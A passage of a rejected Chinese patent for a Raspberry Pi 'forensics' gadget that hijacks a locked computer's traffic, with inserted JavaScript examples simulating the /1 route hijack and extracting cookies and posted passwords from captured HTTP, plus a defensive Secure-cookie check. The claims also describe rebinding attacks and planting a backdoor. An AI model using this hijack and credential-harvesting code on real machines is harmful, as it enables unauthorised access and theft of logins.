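  if (parts.length !== 4 || parts.some(p => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new RangeError('bad IPv4 address: ' + ip);
  }
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

function maskForPrefix(len) {
  if (len < 0 || len > 32) throw new RangeError('bad prefix length: ' + len);
  return len === 0 ? 0 : (0xffffffff << (32 - len)) >>> 0;
}

// A route is { prefix, len, via, dev, metric }; via is null for on-link routes.
function routeMatches(route, dstInt) {
  const mask = maskForPrefix(route.len);
  return ((dstInt & mask) >>> 0) === ((ipToInt(route.prefix) & mask) >>> 0);
}

// Kernel-style lookup: the longest matching prefix wins; metric only breaks ties
// between routes of equal length. Returns the chosen route or null.
function selectRoute(table, dst) {
  const dstInt = ipToInt(dst);
  let best = null;
  for (const r of table) {
    if (!routeMatches(r, dstInt)) continue;
    if (best === null || r.len > best.len || (r.len === best.len && r.metric < best.metric)) {
      best = r;
    }
  }
  return best;
}

// The two routes the gadget's DHCP lease pushes (classless static routes, option 121).
// Together they cover all of IPv4 without ever being a 0.0.0.0/0 default route.
function gadgetRoutes(gadgetIp, dev) {
  return [
    { prefix: '0.0.0.0',   len: 1, via: gadgetIp, dev, metric: 1000 },
    { prefix: '128.0.0.0', len: 1, via: gadgetIp, dev, metric: 1000 },
  ];
}

// Constructed table of a locked laptop: Wi-Fi already connected with the preferred
// (lower) metric, then the gadget's lease applied on usb0 with a worse metric.
function lockedHostTable() {
  return [
    { prefix: '0.0.0.0',     len: 0,  via: '192.168.1.1', dev: 'wlan0', metric: 100 },
    { prefix: '192.168.1.0', len: 24, via: null,          dev: 'wlan0', metric: 100 },
    { prefix: '10.0.0.0',    len: 24, via: null,          dev: 'usb0',  metric: 1000 },
    ...gadgetRoutes('10.0.0.1', 'usb0'),
  ];
}

// Which interface carries each destination, with and without the gadget's /1 routes.
function hijackReport(destinations) {
  const withGadget = lockedHostTable();
  const withoutGadget = withGadget.filter(r => r.len !== 1);
  return destinations.map(dst => ({
    dst,
    before: selectRoute(withoutGadget, dst).dev,
    after: selectRoute(withGadget, dst).dev,
  }));
}
```

hijackReport(['8.8.8.8', '203.0.113.7', '192.168.1.50']) shows the two Internet destinations moving from wlan0 to usb0 once the lease is applied while the on-link LAN address stays on wlan0; the same lookup is what makes the device the path for every request the locked host's browser sends.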
Optionally, the stealing module includes:
A monitoring unit for monitoring, after the target system sends an access request through a browser, the access request and the access response to it based on the network connection traffic;
A first acquisition unit for obtaining the cookie information and routing information of the target system based on the access request and access response, wherein the cookie information includes the ID information, password information and web page information of the target system when it makes the access; the routing information is the routing path the target system traverses when making the access, and the routing path includes at least any of: an internal IP, a node server, a label.
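The following is an added example, not the patent's code, for the monitoring and acquisition units above: the extraction step run over a constructed capture of three cleartext HTTP requests, producing a per-host cookie jar plus any form-encoded credential fields, together with the mirror-image check of which of a site's Set-Cookie lines a browser would ever put on a cleartext request. The device only ever sees HTTP on the wire, so cookies flagged Secure, sites the browser holds HSTS entries for, and anything sent over TLS are outside what this step can collect; HttpOnly does not help, since it hides a cookie from script, not from the network. Host names, cookie values, field names and the credential-field pattern are constructed.

```javascript
'use strict';
// Added example: the "monitor and extract" step over captured cleartext HTTP.
// Sample capture is constructed; only plain HTTP is visible to a device in this position.
const CAPTURE = [
  'GET / HTTP/1.1\r\nHost: forum.example\r\nCookie: sid=abc123; theme=dark\r\nUser-Agent: Mozilla/5.0\r\n\r\n',
  'GET /me HTTP/1.1\r\nHost: mail.example\r\nCookie: auth=ZXhhbXBsZQ==\r\n\r\n',
  'POST /login HTTP/1.1\r\nHost: shop.example\r\nContent-Type: application/x-www-form-urlencoded\r\n' +
    'Content-Length: 31\r\n\r\nuser=alice&password=hunter2&ok=1',
];

// Minimal HTTP/1.1 request parser: request line, lower-cased headers, raw body.
function parseRequest(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  const head = sep === -1 ? raw : raw.slice(0, sep);
  const body = sep === -1 ? '' : raw.slice(sep + 4);
  const lines = head.split('\r\n');
  const [method, path] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, path, headers, body };
}

// "a=1; b=2" -> { a: '1', b: '2' }
function parseCookieHeader(value) {
  const jar = {};
  for (const pair of value.split(';')) {
    const i = pair.indexOf('=');
    if (i > 0) jar[pair.slice(0, i).trim()] = pair.slice(i + 1).trim();
  }
  return jar;
}

// Field names that carry the "ID information" and "password information" of the text
// when a login form is posted in the clear. The pattern is an assumption.
const CREDENTIAL_FIELDS = /^(pass(word|wd)?|pwd|user(name)?|login|email|token)$/i;

function formCredentials(req) {
  const ct = req.headers['content-type'] || '';
  if (req.method !== 'POST' || !ct.startsWith('application/x-www-form-urlencoded')) return {};
  const found = {};
  for (const [k, v] of new URLSearchParams(req.body)) {
    if (CREDENTIAL_FIELDS.test(k)) found[k] = v;
  }
  return found;
}

// host -> { cookies: {...}, credentials: {...} }, merged across the capture.
function siphon(capture) {
  const out = {};
  for (const raw of capture) {
    const req = parseRequest(raw);
    const host = req.headers['host'];
    if (!host) continue;
    const entry = out[host] || (out[host] = { cookies: {}, credentials: {} });
    if (req.headers['cookie']) Object.assign(entry.cookies, parseCookieHeader(req.headers['cookie']));
    Object.assign(entry.credentials, formCredentials(req));
  }
  return out;
}

// Defensive mirror image: given the Set-Cookie lines a site emits, which cookie names
// would a browser ever attach to a cleartext http:// request? Only those without Secure.
function cookiesExposedOverHttp(setCookieLines) {
  return setCookieLines
    .filter(line => !/;\s*secure\b/i.test(line))
    .map(line => line.split(';')[0].split('=')[0].trim());
}
```

siphon(CAPTURE) yields the session cookie for forum.example, the auth cookie for mail.example and the posted user and password for shop.example; cookiesExposedOverHttp(['sid=abc; Path=/; HttpOnly', 'auth=x; Secure; HttpOnly']) returns only ['sid'], which is the one-line review a defender can apply to a site's cookies to see what this collection step could ever have reached.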
Embodiment three:
An embodiment of the invention provides an electronic device; with reference to figure 6, the electronic device includes a processor 30, a memory 31, a bus 32 and a communication interface 33; the processor 30, the communication interface 33 and the memory 31 are connected through the bus 32; the processor 30 is used to execute executable modules, such as computer programs, stored in the memory 31. When the processor executes the program, the steps of the method described in the method embodiments are realised.
The memory 31 may include high-speed random access memory (RAM) and may also include non-volatile memory, for example at least one disk memory. The communication connection between this system network element and at least one other network element is realised through at least one communication interface 33 (which may be wired or wireless), and may use the Internet, a wide area network, a local area network, a metropolitan area network, etc.
The bus 32 may be an ISA bus, a PCI bus, an EISA bus, etc. The bus may be divided into an address bus, a data bus, a control bus, etc. For ease of representation only one double-headed arrow is drawn in figure 6, which does not mean that there is only one bus or one type of bus.
The memory 31 is used to store the program, and the processor 30 executes the program after receiving an execution instruction. The method performed by the flow-processing device disclosed in any of the foregoing embodiments of the invention may be applied in, or implemented by, the processor 30.
The processor 30 may be an integrated circuit chip with signal processing capability. In the course of implementation, each step of the above method may be completed by integrated logic circuits of hardware in the processor 30 or by instructions in the form of software. The processor 30 may be a general-purpose processor, including a central processing unit (CPU), a network processor (NP), etc.; it may also be a digital signal processor (DSP), an application-specific integrated circuit (ASIC), a field-programmable gate array (FPGA) or other programmable logic device, discrete gate or transistor logic, or discrete hardware components. It can implement or execute the methods, steps and logic block diagrams disclosed in the embodiments of the invention. The general-purpose processor may be a microprocessor or any conventional processor. The steps of the methods disclosed in the embodiments of the invention may be embodied directly as being completed by a hardware decoding processor, or by a combination of hardware and software modules in a decoding processor. The software module may be located in a storage medium mature in the art, such as random access memory, flash memory, read-only memory, programmable read-only memory, electrically erasable programmable memory or a register. The storage medium is located in the memory 31; the processor 30 reads the information in the memory 31 and completes the steps of the above method in combination with its hardware.
The computer program product of the Raspberry Pi based rapid electronic forensics method, device and electronic equipment provided by the embodiments of the invention includes a computer-readable storage medium storing program code; the instructions included in the program code can be used to perform the method described in the foregoing method embodiments. For the specific implementation see the method embodiments, which are not repeated here.
Those skilled in the art will clearly understand that, for convenience and brevity of description, the specific working processes of the systems and devices described above may refer to the corresponding processes in the foregoing method embodiments and are not repeated here.
In addition, in the description of the embodiments of the invention, unless otherwise expressly specified and limited, the terms "mounted", "connected to" and "connected" are to be understood broadly; for example, they may be a fixed connection, a detachable connection or an integral connection; a mechanical connection or an electrical connection; a direct connection or an indirect connection through an intermediary; or an internal communication between two elements. For those of ordinary skill in the art, the specific meaning of the above terms in the invention can be understood according to the specific circumstances.
If the functions are realised in the form of software functional units and sold or used as independent products, they may be stored in a computer-readable storage medium. Based on this understanding, the technical solution of the invention in essence, or the part contributing to the prior art, or part of the technical solution, may be embodied in the form of a software product stored in a storage medium and including several instructions for causing a computer device (which may be a personal computer, a server, a network device, etc.) to perform all or part of the steps of the methods of the embodiments of the invention. The foregoing storage medium includes: a USB flash disk, a removable hard disk, read-only memory (ROM), random access memory (RAM), a magnetic disk, an optical disk, and other media that can store program code.
In the description of the invention it should be noted that the orientation or positional relationships indicated by terms such as "centre", "upper", "lower", "left", "right", "vertical", "horizontal", "inner" and "outer" are based on those shown in the drawings, solely to facilitate and simplify the description, and do not indicate or imply that the device or element referred to must have a specific orientation or be constructed and operated in a specific orientation; they are therefore not to be understood as limiting the invention. In addition, the terms "first", "second" and "third" are used for descriptive purposes only and are not to be understood as indicating or implying relative importance.
Finally it should be noted that the embodiments described above are only specific embodiments of the invention, used to illustrate its technical solution and not to limit it, and the scope of protection of the invention is not limited to them. Although the invention has been described in detail with reference to the foregoing embodiments, those skilled in the art will understand that anyone familiar with the art can still, within the technical scope disclosed by the invention, modify the technical solutions described in the foregoing embodiments or readily conceive of changes, or substitute equivalents for some of the technical features; such modifications, changes or substitutions do not cause the essence of the corresponding technical solution to depart from the spirit and scope of the technical solutions of the embodiments of the invention, and shall all be covered by the scope of protection of the invention. Therefore the scope of protection of the invention shall be defined by the scope of the claims.

Claims (10)

1. A rapid electronic forensics method based on a Raspberry Pi, characterised in that it is applied at the Raspberry Pi end and comprises:
hijacking the network connection traffic of a target system in the screen-locked state, wherein the target system is a suspect's system;
stealing cookie information and routing information of the target system based on the network connection traffic;
performing, according to the cookie information and the routing information, a rebinding attack on the target system by outbound means to obtain target information, and sending the target information to a terminal of forensic personnel, wherein the target information is information related to the suspect's crime.
2. The method according to claim 1, characterised in that, after performing the rebinding attack by outbound means according to the cookie information and the routing information to obtain the target information, the method further comprises:
forcibly caching a backdoor in the network environment of the target system, so that the forensic personnel obtain the target information by accessing the backdoor.
3. The method according to claim 1, characterised in that hijacking the network connection traffic of the target system in the screen-locked state comprises:
accessing the target system according to an access operation of the forensic personnel, disguised as a fake Ethernet device;
connecting the target system to the fake Ethernet, so as to hijack the network connection traffic of the target system.
4. The method according to claim 1, characterised in that stealing the cookie information and routing information of the target system based on the network connection traffic comprises:
after the target system sends an access request through a browser, monitoring the access request and the access response to the access request based on the network connection traffic;
obtaining the cookie information and routing information of the target system based on the access request and the access response,
wherein the cookie information includes ID information, password information and web page information of the target system when making the access; the routing information is the routing path the target system traverses when making the access, and the routing path includes at least any of: an internal IP, a node server, a label.
5. The method according to claim 2, characterised in that forcibly caching a backdoor in the network environment of the target system so that the forensic personnel obtain the target information by accessing the backdoor comprises:
hijacking the LAN routing information connected to the target system;
determining a target server according to the LAN routing information, wherein the target server is the server corresponding to target routing information in the LAN routing information, and the target routing information is the best-performing information in the LAN routing information;
forcibly caching the backdoor on the target server, so as to generate a persistent rebinding attack;
obtaining the target information based on the persistent rebinding attack.
6. A rapid electronic forensics device based on a Raspberry Pi, characterised in that it is applied at the Raspberry Pi end and comprises:
a hijacking module for hijacking the network connection traffic of a target system in the screen-locked state, wherein the target system is a suspect's system;
a stealing module for stealing cookie information and routing information of the target system based on the network connection traffic;
a rebinding attack module for performing, according to the cookie information and the routing information, a rebinding attack on the target system by outbound means to obtain target information, and sending the target information to a terminal of forensic personnel, wherein the target information is information related to the suspect's crime.
7. The device according to claim 6, characterised in that the device further comprises:
a backdoor caching module for forcibly caching a backdoor in the network environment of the target system, so that the forensic personnel obtain the target information by accessing the backdoor.
8. The device according to claim 6, characterised in that the hijacking module comprises:
a first access unit for accessing the target system according to an access operation of the forensic personnel, disguised as a fake Ethernet device;
a second access unit for connecting the target system to the fake Ethernet, so as to hijack the network connection traffic of the target system.
9. The device according to claim 6, characterised in that the stealing module comprises:
a monitoring unit for monitoring, after the target system sends an access request through a browser, the access request and the access response to the access request based on the network connection traffic;
a first acquisition unit for obtaining the cookie information and routing information of the target system based on the access request and the access response, wherein the cookie information includes ID information, password information and web page information of the target system when making the access; the routing information is the routing path the target system traverses when making the access, and the routing path includes at least any of: an internal IP, a node server, a label.
10. An electronic device comprising a memory and a processor, the memory storing a computer program runnable on the processor, characterised in that the processor, when executing the computer program, realises the steps of the method according to any one of claims 1 to 5.
CN201711134861.9A 2017-11-15 2017-11-15 Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi Pending CN107819862A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201711134861.9A CN107819862A (en) 2017-11-15 2017-11-15 Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201711134861.9A CN107819862A (en) 2017-11-15 2017-11-15 Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi

Publications (1)

Publication Number Publication Date
CN107819862A true CN107819862A (en) 2018-03-20

Family

ID=61609839

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201711134861.9A Pending CN107819862A (en) 2017-11-15 2017-11-15 Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi

Country Status (1)

Country Link
CN (1) CN107819862A (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN110536305A (en) * 2019-08-29 2019-12-03 武汉赛可锐信息技术有限公司 Wi-Fi hotspot methods of investigation, device, terminal device and storage medium
CN111881384A (en) * 2020-07-02 2020-11-03 北京华赛在线科技有限公司 Illegal external connection evidence obtaining method, system and storage medium
CN112583848A (en) * 2020-12-25 2021-03-30 南京联成科技发展股份有限公司 Remote security log analysis system

Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US7610400B2 (en) * 2004-11-23 2009-10-27 Juniper Networks, Inc. Rule-based networking device
CN106130957A (en) * 2016-06-08 2016-11-16 Shandong Normal University Police remote WiFi network investigation and forensics system based on Raspberry Pi and method thereof
CN106227780A (en) * 2016-07-18 2016-12-14 Institute of Information Engineering, Chinese Academy of Sciences Automated screenshot forensics method and system for massive web pages
US20170199736A1 (en) * 2016-01-07 2017-07-13 Ca, Inc. Transactional boundaries for software system profiling


Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
CLOUDS: "Breaking into any password-protected PC in 30 seconds: a close look at the $5 hacker gadget PoisonTap", WWW.FREEBUF.COM/SECTOOL/120354.HTML *

Cited By (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN110536305A (en) * 2019-08-29 2019-12-03 武汉赛可锐信息技术有限公司 Wi-Fi hotspot methods of investigation, device, terminal device and storage medium
CN110536305B (en) * 2019-08-29 2023-09-12 武汉赛可锐信息技术有限公司 WiFi hot spot detection method and device, terminal equipment and storage medium
CN111881384A (en) * 2020-07-02 2020-11-03 北京华赛在线科技有限公司 Illegal external connection evidence obtaining method, system and storage medium
CN111881384B (en) * 2020-07-02 2023-05-26 北京华赛在线科技有限公司 Evidence obtaining method, system and storage medium for illegal external connection
CN112583848A (en) * 2020-12-25 2021-03-30 南京联成科技发展股份有限公司 Remote security log analysis system

Similar Documents

Publication Publication Date Title
US10826872B2 (en) Security policy for browser extensions
Wu et al. Effective defense schemes for phishing attacks on mobile computing platforms
USRE45139E1 (en) Method and apparatus for cross-domain communication using designated response processing page
US20170243003A1 (en) Identifying bots
CN104429110B (en) Communication method and device
US10931686B1 (en) Detection of automated requests using session identifiers
EP3021551A1 (en) Method of identifying and counteracting internet attacks
CN111866124B (en) Method, device, server and machine-readable storage medium for accessing webpage
CN105659520A (en) Secure proxy to protect private data
CN103607385A (en) Method and apparatus for security detection based on browser
CN101682626A (en) Method and system for simulating a hacking attack on a network
CN106453216A (en) Malicious website interception method, malicious website interception device and client
CN109150874A (en) Access authentication method, device and authenticating device
CN107819862A (en) Swift electron evidence collecting method, device and electronic equipment based on Raspberry Pi
GB2516972A (en) Validating DDoS attacks based on social media content
CN110430188A (en) A kind of quick url filtering method and device
CN112532605B (en) Network attack tracing method and system, storage medium and electronic device
CN109617917A (en) Address virtual Web application security firewall methods, devices and systems
CN106576051A (en) Zero day threat detection using host application/program to user agent mapping
CN110099129A (en) A kind of data transmission method and equipment
CN105337776B (en) Method and device for generating website fingerprint and electronic equipment
CN108781367A (en) The method for reducing Cookie injection and Cookie Replay Attacks
CN106230781A (en) The method and device preventing network attack of sing on web authentication techniques
CN104243488B (en) A kind of login authentication method of inter-network site server
CN111147625B (en) Method, device and storage medium for acquiring local external network IP address

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
RJ01 Rejection of invention patent application after publication

Application publication date: 20180320